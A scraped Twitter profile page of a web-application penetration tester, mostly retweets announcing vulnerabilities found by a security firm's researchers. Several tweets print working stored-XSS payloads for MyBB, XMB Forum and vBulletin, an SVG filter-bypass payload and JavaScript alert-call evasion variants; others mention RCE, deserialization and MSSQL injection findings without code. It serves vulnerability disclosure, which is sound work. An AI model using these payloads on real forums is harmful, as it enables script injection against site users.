Psych0tr1a

@Psych0tr1a

Bughunter, web-application security researcher, penetration tester from

another space
Joined September 2014

Tweets

You blocked @Psych0tr1a

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @Psych0tr1a

  1. Retweeted
    Mar 26

    I recently found a vulnerability in PHP that allows you to circumvent filter_var() in some cases! Because the PHP team is not responding, I decided to post it. Guess what the input should be in the picture below! My post is at 😁

    Undo
  2. Retweeted
    Feb 9

    It's the second year in a row, our research was voted into the "Top 10 web hacking techniques"! (2021) Our sincere gratitude goes out to the community and the panel. Read the research by Igor Sak-Sakovskiy:

    Undo
  3. Retweeted
    Feb 2

    Here's how to use it without xlink:href: <svg><use id=x><animate attributeName="href" values="data&colon;image/svg+xml,&lt;svg id='x' xmlns='http&colon;//www&period;w3&period;org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;" /></use>

    Show this thread
    Undo
  4. Retweeted
    29 Dec 2021

    💥 New article "Fuzzing for XSS via nested parsers condition" by our researcher . This techniques allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before!

    Undo
  5. Retweeted
    22 Dec 2021

    🎯 PoC for a stored XSS in XMB Forum (CVE-2021-29399). The vulnerability was found by our researcher . Payload: [url]http://a[url=http://onmouseover=alert(1)//]a[/url][/url] Advisory:

    Undo
  6. Retweeted
    7 Dec 2021

    🎁 PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email] Advisory:

    Undo
  7. Retweeted
    14 Dec 2021

    PoC for a stored XSS in (CVE-2021-22886). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [ ]() <; a|Text>th/a

    Undo
  8. Retweeted
    30 Nov 2021

    🔥 The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher . PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory:

    Show this thread
    Undo
  9. Retweeted
    28 Oct 2021

    Some more function calls variants by alert.bind()(1) alert.valueOf()(1) Reflect.apply(alert, null, [1]) Promise.all([1]).then(alert)

    Undo
  10. 20 Oct 2021

    Just a RCE in WinRAR, nothing interesting😏

    Undo
  11. Retweeted
    8 Sep 2021

    🚨RCE on a backend IIS server via file upload with an atypical file extension. 📋More community curated payloads can be found at

    Undo
  12. Retweeted
    12 Aug 2021

    MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy. RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith. Advisory:

    Show this thread
    Undo
  13. Retweeted
    5 Jul 2021

    Я и мы (Positive Technologies) ищем в специалистов на направления анализа защищенности веба, финансовых приложений и мобилок

    Show this thread
    Undo
  14. 1 Jul 2021
    Undo
  15. 27 Mar 2021
    Show this thread
    Undo
  16. Retweeted
    25 Mar 2021

    fixed a persistent XSS found by our researcher Igor Sak-Sakovskiy. The vulnerability was triggered by sending a text message, resulting in an arbitrary file read or RCE on the recipient's desktop system.

    Undo
  17. 11 Feb 2021

    Hi . I want to publish critical vulnerability. Can you contact me?

    Show this thread
    Undo
  18. Retweeted
    23 Nov 2020

    New gadget chain for deserialization in Zend Framework applications. Triggers on __destruct(), gives RCE and works in PHP 7.

    Undo
  19. Retweeted
    12 Nov 2020

    💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article:

    Undo
  20. Retweeted
    17 Jun 2020

    mXSS vulnerability in AngularJS, nice finding by

    Undo

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·